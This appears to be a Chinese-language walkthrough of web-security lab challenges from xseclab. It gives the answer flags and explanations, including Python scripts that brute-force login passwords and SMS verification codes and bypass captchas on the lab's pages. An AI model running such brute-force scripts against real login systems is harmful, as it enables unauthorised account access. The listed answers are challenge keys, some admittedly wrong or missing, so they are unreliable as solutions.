1. 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!
地址: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php
正确答案: yougotit_script_now
答案解析:我们发现点击后又重定向了,在burpsuite的target里面我们看该目录的回应数据,可以发现key
如图:
2.快速口算:小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?
地址: http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php
正确答案: 123iohHKHJ%^&*(jkh
答案解析:这种需要使用脚本来获取key,因为只有2秒,不可能人来操作。python代码如下:
view plaincopy to clipboard
- import requests
- import re
- from selenium import webdriver
- dirver=webdriver.Chrome()
-
- url="http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
- dirver.get(url)#使用Chrome打开地址
- res=dirver.page_source#读取页面代码
- print("页面代码:\n%s" %res)
- num=re.findall(r'[0-9+*()]+[)]',res)#获取计算式
- result=eval(num[0].strip())#计算结果
- print("计算结果:%s"%result)
- dirver.find_element_by_name( "v").send_keys(result)#搜索输入框输入result
- dirver.find_element_by_xpath( "html/body/form").submit()#点击提交按钮
- res=dirver.page_source#读取页面代码
- print("新页面代码:\n%s" %res)
3.这个题目是空的
Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)
正确答案: null
答案解析:为空,而且必须输入,当然是null啊!
4.怎么就是弹不出key呢?
提交说明:提交前14个字符即可过关
地址: http://lab1.xseclab.com/xss3_5dcdde90bbe55087eb3514405972b1a6/index.php
正确答案: slakfjteslkjsd
答案解析:查看源码,发现前面有一个a函数返回失败,去掉这些返回为false的函数,然后在稍微修改下:
view plaincopy to clipboard
-
-
-
-
-
-
- _点击之后怎么没反应呢?说好的弹窗呢?__
-
-
-
5.逗比验证码第一期:逗比的验证码,有没有难道不一样吗?
地址: http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php
正确答案: LJLJL789sdf#@sd
答案解析:这题想让我们暴力破解,而人工来破解的花至少2小时把,所以我用python来破解,代码如下:
view plaincopy to clipboard
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
- head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(1000,10000):
- data={'username':'admin','pwd':num,'vcode':'GNZX','submit':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'pwd error' in res:
- print('正在尝试',num,'------密码错误!')
- if u'vcode error' in res:
- print('验证码错误!')
- break
- if u'error' not in res:
- print(num,'----密码破解成功!')
- print(res)
- break
6.逗比的验证码第二期:验证便失效的验证码
地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php
正确答案: LJLJL789ss33fasvxcvsdf#@sd
答案解析:将验证码改为空即可
view plaincopy to clipboard
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
- head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(1000,10000):
- data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'pwd error' in res:
- print('正在尝试',num,'------密码错误!')
- if u'vcode error' in res:
- print('验证码错误!')
- break
- if u'error' not in res:
- print(num,'----密码破解成功!')
- print(res)
- break
7.逗比的验证码第三期:验证便失效的验证码
地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php
正确答案: LJLJLfuckvcodesdf#@sd
答案解析:将验证码去除,cookie改为session即可
view plaincopy to clipboard
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
- head={'session':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(1000,10000):
- data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'pwd error' in res:
- print('正在尝试',num,'------密码错误!')
- if u'vcode error' in res:
- print('验证码错误!')
- break
- if u'error' not in res:
- print(num,'----密码破解成功!')
- print(res)
- break
8.微笑一下就能通过拉!尼玛,碰到这样的题我能笑得出来嘛...
地址: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php
正确答案: hkjasfhsa*&IUHKUH
答案解析:查看源代码我们可以发现一个超链接,打开这个超链接是PHP代码,观察后发现from是POST提交,PHP处理是GET,呵呵(●'?'●) 微笑
在后缀里面加?^.^=data:,(●'?'●) 即可
9. 逗比的手机验证码:你的手机号码是13388886666,验证码将会以弹窗的形式给出
地址: http://lab1.xseclab.com/vcode5_mobi_5773f3def9f77f439e058894cefc42a8/
正确答案: LJLJLGod!@@sd
答案解析:傻吊题啊,获取验证码登陆提示13388886667登陆,重新来就是
10.基情燃烧的岁月:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666
地址: http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/
正确答案: 13399999999
答案解析:用python来破解验证码:
view plaincopy to clipboard
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
- head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(100,1000):
- data={'username':'13388886666','vcode':num,'Login':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'vcode or username error' in res:
- print('正在尝试',num,'------验证码错误!')
- if u'error' not in res:
- print(num,'----验证码破解成功!')
- print(res)
- break
但是不知道为什么答案还是错的!
11.验证码识别 Tips:验证码依然是3位数
地址: http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php
正确答案:
答案解析:暂时没弄出来
12.XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>
地址: http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php
正确答案:
答案解析:暂时没弄出来